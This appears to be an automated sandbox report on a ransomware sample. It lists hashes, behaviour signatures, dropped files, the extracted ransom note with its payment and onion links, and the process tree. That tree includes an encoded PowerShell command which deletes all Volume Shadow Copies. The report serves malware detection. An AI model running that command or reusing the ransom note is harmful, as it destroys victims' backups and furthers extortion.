Analysis

  • max time kernel
    146s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    21-05-2024 14:50

General

  • Target

    63ae6ca6853552716571555546833d99_JaffaCakes118.exe

  • Size

    166KB

  • MD5

    63ae6ca6853552716571555546833d99

  • SHA1

    09e37e98a74ec8edb36b22a4eb51dbed4390544a

  • SHA256

    9d3a482d9441876096e0cee429fedf7b9f7e1c6a50b3e4b2009884019627d879

  • SHA512

    087baf5fbf764f480f384cbdee878d3dfb8b3880f378b4597d5e292f392341e5da196ee2232a441c6268b7760afffdde293f35f536ee55cff4992b4b45238f86

  • SSDEEP

    1536:EOYMGzUt2Z+tRvSKGNkR87Kk9VWvDtwVQKeDZz0TDsTR6wss+oJ27b5EIBNUup7E:EJMawtnGqtWoKeZC62aoNUSncZUw+S3

Score
10/10

Malware Config

Extracted

Path

C:\Users\readme-j008b4a42n-NOW.txt

Ransom Note
Your files are locked due to a vulnerability in your system by "j008b4a42n" extension. You will not be able to decrypt the files yourself, in the worst case you can destroy the data irreversibly. The only way to unlock your data is to buy the decryption program. Go to the link written below to more details. If you cannot do this yourself, find a data recovery company in internet. They cannot help you unlock your data, because only we have decryption key, but will help you make a payment and provide you guarantees. ATTENTION! DATA RECOVERY AGENCIES WORK AND DURING THE CORONOVIRUS QUARANTINE, THEY WILL HELP YOU REMOTE. Also, I ask you to note, you have no long time, if you do not make payment soon, the price for the decryptor will double. So I recommend you dont waste time and move! Go to the page through the browser: http://decryptor.cc/71639715C427C907 If your site does not open, then download the "TOR Browser" (https://torproject.org/). If you cannot access the download page of the "TOR Browser", then download the VPN! After installing "TOR Browser", open it and follow the link: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/71639715C427C907 After going to the site, enter the following code: idmdCliYdIk8qzMNaIAyUig7awNVXJ7Wp8u3mXxdums80evXBfM8NISECrZCyt8t NjGj6JPSGX3HHGp9zMPmmcusMdIyL1+XkMGBsBwQR9SAD1oAqN9Eg1Fy42PDmCzu j6YFwhm6IxkZnRo+WoU6YnG3rD9NV5QxPQyDBHQXAqvTiHuw6mQR+Gr1kWJP/VzB bdLsp5djmA8RVLap/oh63Xb0LfZYH0jSHGnEH9dTgpcZg9v2oG+t+bglmM8Ct0WL lR/oq4MxLkqBlTDo8Nqz++tBAp3tKKBnBt4Tf7HPeqs0p+3J22jD1e2ZCk+sK/RL D3HrhTJBCAjn7tSkl7jZeZzrjP306oZe58+qP2s4Q9Ld2bygsTGqHE4Tz8dDVI+V 3FmkJUJ9PB9NnGzoK5HFY6pUKv7p/CYtQ1wbst+Y6EOCIzQfnuGXH8ECUWu1srhC abVx9KG9TDqeB2v8wQmM1aOa+Q1w7j5/x6UpTDorsYCWjJLDRfX8/8GuU1RkQtRr cek9WoYi3C8cLgLi8JmTMnTh1vh4/b84TnwEwrBvcTh0IZvd4vF2RvHCI4ywgeu1 jXeDhGDisjlft/MhMv7GD4ZhmcojX9+2EBZqRpxuaApsftS4bNGDf0zO8SfKJJQt 4XEtaL9ufgmKHM/Pa6/eEMS7y8mM2B7ucvdtWybZcrvTtCogYyZxf9QsSOTSfSFf DuCiHVxvGvP/lnm7JSNew0c9Anj+E7RRGDq/k2475379kyh3tFMNyty5oUujK+7D ndptqaSynNfD6o5ATtVVQ3TrLmz2884lBe7raEj+RjuwI4y9HxDERGafDevMYOhE DbiistXgwNSkJ4sAO3DEE7hqnglywOMm/+h/2hGATbtUH7LTUfp2p8oJmF5OVxvJ RjJDLDEFfs6WALEiD/4L4YhGPhNycwYagz+oqFj7kpLfduWpha4ddce2aqk81a8/ /vK+3cwvB81HFn9tqTV//6ZoRnYHfFcWoqtmzZwfsUhbVmuY2AHJRyb+dtBRT4sc XEIjc5z26AzhRBh2gH+nAmxYRZvIOEvezCA7mIaOIX9dCzgUQ5lDpTNzTCVGCWgz 4yiJx7WCR8gC6mAEZqiCJLKms0L4W6zgabksK9Ifq/jeuKS9tYIAWvpI9QAyRfbW WOPXaqMg7AIB3Q8vWGLMggiqwwLJJkcNjIx7o2xWOUks6nM9lY9yd+bzG933s6xm jcvFxMbmWFvymi23Oaldy0QgE+ZI0OfTkgVv4jTfI2ay1+nmp13soGBckBNyKAOd lzOL5fzYWcBj4kxARNkImkEeVhXRTw8H9/lEr98dGjN8J/IqA2GYA7lGWpmcymj4 hYxoJyEJu3fZoRhlg5hdFOEE4mDZpOmcCPnJaSE/6MtkTv8GaJgiuQ==
URLs

http://decryptor.cc/71639715C427C907

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/71639715C427C907

Signatures

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 36 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\63ae6ca6853552716571555546833d99_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\63ae6ca6853552716571555546833d99_JaffaCakes118.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1652
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2736
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:3064
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2564

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
      Filesize

      1KB

      MD5

      a266bb7dcc38a562631361bbf61dd11b

      SHA1

      3b1efd3a66ea28b16697394703a72ca340a05bd5

      SHA256

      df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

      SHA512

      0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
      Filesize

      242B

      MD5

      f23aee25dd724c21b6bad5441effbb68

      SHA1

      21a904ea6b13a23f6dcaa307c4065653921bc7c4

      SHA256

      1b7a4bcc799693aa07c2fa8721389143c0ae38ff0ace0145df8014640c155262

      SHA512

      b7ab82628e6b3a024243602d9f26afa32873edf29fc52b81805dc9845bbe3676263737db862e99b12e950d5b7421ae37c913689a26bc961bdb16e8ac180a9b5e

    • C:\Users\Admin\AppData\Local\Temp\Tar95DE.tmp
      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

    • C:\Users\readme-j008b4a42n-NOW.txt
      Filesize

      5KB

      MD5

      8155aa930219e29cf549609fdc56776c

      SHA1

      b175ced44bf6cd776ba2d47af6601d1f5b922cf5

      SHA256

      ebca0b349a7da08111b811a73a0514f1636d4d8deac30b557a0a46067162b162

      SHA512

      6ed4e7d76c9de2a73222fa5ce9eeb7320441cfed825b69e724646c225017bfb9fefce709b66bfdfdbd8804eb17c2b0cd085e8f66fc96ef0813f7e80737154461

    • C:\Windows\System32\catroot2\dberr.txt
      Filesize

      194KB

      MD5

      f2bf84d2147a2f0c15b6bedabb7e0cf7

      SHA1

      e754895deab735842dc19d5c7e8f4dd403ead05b

      SHA256

      45ed7726792ba4a3b0246ee4e37d29053ead641f9e4bc384234b612f66a91752

      SHA512

      ca6ba2f511257dec7d924ff4fe9684748f0c857e4cd78c0f04edd97c88e2fceb071617ca5149ce493da3259dd1a57d5908af13c1cb73a1687734e1afbe8b7176

    • memory/2736-7-0x000007FEF5BA0000-0x000007FEF653D000-memory.dmp
      Filesize

      9.6MB

    • memory/2736-10-0x000007FEF5BA0000-0x000007FEF653D000-memory.dmp
      Filesize

      9.6MB

    • memory/2736-9-0x000007FEF5BA0000-0x000007FEF653D000-memory.dmp
      Filesize

      9.6MB

    • memory/2736-8-0x000007FEF5BA0000-0x000007FEF653D000-memory.dmp
      Filesize

      9.6MB

    • memory/2736-4-0x000007FEF5E5E000-0x000007FEF5E5F000-memory.dmp
      Filesize

      4KB

    • memory/2736-6-0x0000000001F50000-0x0000000001F58000-memory.dmp
      Filesize

      32KB

    • memory/2736-5-0x000000001B6A0000-0x000000001B982000-memory.dmp
      Filesize

      2.9MB